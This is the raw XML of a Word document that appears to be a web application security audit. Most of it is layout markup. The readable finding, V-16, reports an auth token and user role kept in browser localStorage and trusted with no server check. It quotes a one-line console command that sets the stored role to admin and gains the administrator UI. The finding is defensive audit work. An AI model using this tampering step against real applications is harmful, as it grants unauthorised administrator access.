                <v:shape id="Shape 1821" o:spid="_x0000_s1267" style="position:absolute;left:23717;width:15049;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1504950,133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31xxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/odlhN50E1ttTN1IKRRKLxqrB29DdsyGZmdDdqvpv+8WBG/zeJ+z3gy2FRfqfeNYQTpLQBBX&#10;TjdcKzh8vU8zED4ga2wdk4Jf8rApxqM15tpduaTLPtQihrDPUYEJocul9JUhi37mOuLInV1vMUTY&#10;11L3eI3htpXzJFlKiw3HBoMdvRmqvvc/VsHRPCefp8eh450tF1lWrcz2aaXUw2R4fQERaAh38c39&#10;oeP8bJ7C/zfxBFn8AQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAPqjfXHEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l1495425,v2631,,4875,930,6735,2778c1504020,4638,1504950,6890,1504950,9525r,114294c1504950,126448,1504020,128693,1502160,130553v-1860,1861,-4104,2791,-6735,2791l9525,133344v-2630,,-4875,-930,-6735,-2791c930,128693,,126448,,123819l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1504950,133344"/>
                </v:shape>
                <v:rect id="Rectangle 1822" o:spid="_x0000_s1268" style="position:absolute;left:23943;top:236;width:19380;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536608B7" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>upgrade-insecure-requests</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1823" o:spid="_x0000_s1269" style="position:absolute;left:38784;top:88;width:3085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39765939" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> in the new CSP as browser-side backstops.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC941D6" w14:textId="77777777" w:rsidR="00C73B1A" w:rsidRDefault="00C73B1A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="24"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41EDB075" w14:textId="649A33FC" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="24"/>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6784" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5B6EC3E6" wp14:editId="435E2DDD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1084957</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-2079</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="752475" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27432" name="Group 27432"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="752475" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="752475" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1839" name="Shape 1839"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="752475" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="752475" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="742950" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="745580" y="0"/>
                                  <a:pt x="747825" y="930"/>
                                  <a:pt x="749685" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="751545" y="4638"/>
                                  <a:pt x="752475" y="6883"/>
                                  <a:pt x="752475" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="752475" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="752475" y="135979"/>
                                  <a:pt x="751545" y="138224"/>
                                  <a:pt x="749685" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="747825" y="141945"/>
                                  <a:pt x="745580" y="142875"/>
                                  <a:pt x="742950" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6883"/>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32" style="width:59.25pt;height:11.25pt;position:absolute;z-index:-2147483641;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:85.4297pt;mso-position-vertical-relative:text;margin-top:-0.163769pt;" coordsize="7524,1428">
                <v:shape id="Shape 1839" style="position:absolute;width:7524;height:1428;left:0;top:0;" coordsize="752475,142875" path="m9525,0l742950,0c745580,0,747825,930,749685,2778c751545,4638,752475,6883,752475,9525l752475,133350c752475,135979,751545,138224,749685,140084c747825,141945,745580,142875,742950,142875l9525,142875c6895,142875,4650,141945,2790,140084c930,138224,0,135979,0,133350l0,9525c0,6883,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V-16 · Token in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>localStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>; role trusted from client storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56974874" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="173"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A07:2021 / A01:2021 · </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CWE-522</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CWE-603</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High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C3682E" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">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Three related defects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57805E9D" w14:textId="6552029D" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="265" w:right="16" w:hanging="251"/>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7808" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0F1252ED" wp14:editId="4D040731">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2161282</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-18985</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="752475" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27435" name="Group 27435"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="752475" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="752475" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1852" name="Shape 1852"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="752475" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="752475" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="742950" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="745580" y="0"/>
                                  <a:pt x="747825" y="930"/>
                                  <a:pt x="749685" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="751545" y="4651"/>
                                  <a:pt x="752475" y="6896"/>
                                  <a:pt x="752475" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="752475" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="752475" y="135979"/>
                                  <a:pt x="751545" y="138224"/>
                                  <a:pt x="749685" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="747825" y="141945"/>
                                  <a:pt x="745580" y="142875"/>
                                  <a:pt x="742950"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35" style="width:59.25pt;height:11.25pt;position:absolute;z-index:-2147483628;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:170.18pt;mso-position-vertical-relative:text;margin-top:-1.49493pt;" coordsize="7524,1428">
                <v:shape id="Shape 1852" style="position:absolute;width:7524;height:1428;left:0;top:0;" coordsize="752475,142875" path="m9525,0l742950,0c745580,0,747825,930,749685,2791c751545,4651,752475,6896,752475,9525l752475,133350c752475,135979,751545,138224,749685,140084c747825,141945,745580,142875,742950,142875l9525,142875c6895,142875,4650,141945,2790,140084c930,138224,0,135979,0,133350l0,9525c0,6896,930,4651,2790,2791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The token and full user record lived in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>localStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  readable</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> by any script on the origin, not scoped to a tab, surviving browser close. This is the storage that V-13's payload read.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BA85D3" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="61" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="265" w:right="16" w:hanging="251"/>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role</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> was read back out of that writable storage and used for access control </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App.jsx</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50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lib/auth.js:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">15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and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ACD2DB"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8832" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2E94CC60" wp14:editId="1D715618">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-192441</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1838325" cy="485775"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27437" name="Group 27437"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1838325" cy="485775"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1838325" cy="485775"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1858" name="Shape 1858"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="133350" y="0"/>
                            <a:ext cx="285750" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="930"/>
                                  <a:pt x="282960" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4651"/>
                                  <a:pt x="285750" y="6896"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="126454"/>
                                  <a:pt x="284820" y="128699"/>
                                  <a:pt x="282960" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="132420"/>
                                  <a:pt x="278855" y="133350"/>
                                  <a:pt x="276225"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67" name="Shape 1867"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="171450"/>
                            <a:ext cx="1276350" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1276350" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1266825" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1269455" y="0"/>
                                  <a:pt x="1271700" y="930"/>
                                  <a:pt x="1273560" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1275420" y="4651"/>
                                  <a:pt x="1276350" y="6896"/>
                                  <a:pt x="1276350" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1276350" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1276350" y="126467"/>
                                  <a:pt x="1275420" y="128699"/>
                                  <a:pt x="1273560" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1271700" y="132420"/>
                                  <a:pt x="1269455" y="133350"/>
                                  <a:pt x="1266825" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="123825"/>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74" name="Shape 1874"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="342900"/>
                            <a:ext cx="1838325" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1838325" h="142875">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1828800" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1831430" y="0"/>
                                  <a:pt x="1833675" y="930"/>
                                  <a:pt x="1835535" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1837395" y="4651"/>
                                  <a:pt x="1838325" y="6896"/>
                                  <a:pt x="1838325" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1838325" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1838325" y="135992"/>
                                  <a:pt x="1837395" y="138224"/>
                                  <a:pt x="1835535" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1833675" y="141945"/>
                                  <a:pt x="1831430" y="142875"/>
                                  <a:pt x="1828800" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="142875"/>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37" style="width:144.75pt;height:38.25pt;position:absolute;z-index:-2147483613;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:1.42969pt;mso-position-vertical-relative:text;margin-top:-15.1529pt;" coordsize="18383,4857">
                <v:shape id="Shape 1858" style="position:absolute;width:2857;height:1333;left:1333;top:0;" coordsize="285750,133350" path="m9525,0l276225,0c278855,0,281100,930,282960,2791c284820,4651,285750,6896,285750,9525l285750,123825c285750,126454,284820,128699,282960,130559c281100,132420,278855,133350,276225,133350l9525,133350c6895,133350,4650,132420,2790,130559c930,128699,0,126454,0,123825l0,9525c0,6896,930,4651,2790,2791c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1867" style="position:absolute;width:12763;height:1333;left:0;top:1714;" coordsize="1276350,133350" path="m9525,0l1266825,0c1269455,0,1271700,930,1273560,2791c1275420,4651,1276350,6896,1276350,9525l1276350,123825c1276350,126467,1275420,128699,1273560,130559c1271700,132420,1269455,133350,1266825,133350l9525,133350c6895,133350,4650,132420,2790,130559l0,123825l0,9525l2790,2791c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1874" style="position:absolute;width:18383;height:1428;left:0;top:3429;" coordsize="1838325,142875" path="m0,0l1828800,0c1831430,0,1833675,930,1835535,2791c1837395,4651,1838325,6896,1838325,9525l1838325,133350c1838325,135992,1837395,138224,1835535,140084c1833675,141945,1831430,142875,1828800,142875l0,142875l0,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AuthContext.jsx:27-46</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> restored the session with </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>no server call at all</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. Typing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>localStorage.setItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">('user', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JSON.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>stringify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>({</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>role:'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin</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and reloading produced the administrator UI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19220848" w14:textId="163B2D4F"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69856" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="20009AAE" wp14:editId="523AD562">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3866256</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-621949</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1981201" cy="1352550"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27439" name="Group 27439"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1981201" cy="1352550"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1981201" cy="1352550"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1861" name="Shape 1861"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="361950" y="0"/>
                            <a:ext cx="628650" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="628650" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="619125" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="621755" y="0"/>
                                  <a:pt x="624000" y="930"/>
                                  <a:pt x="625860" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="627720" y="4651"/>
                                  <a:pt x="628650" y="6896"/>
                                  <a:pt x="628650" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="628650" y="126454"/>
                                  <a:pt x="627720" y="128699"/>
                                  <a:pt x="625860" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="624000" y="132420"/>
                                  <a:pt x="621755" y="133350"/>
                                  <a:pt x="619125"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64" name="Shape 1864"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1057275" y="0"/>
                            <a:ext cx="876301" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="876301" h="133350">
                                <a:moveTo>
                                  <a:pt x="9526" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="866776" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
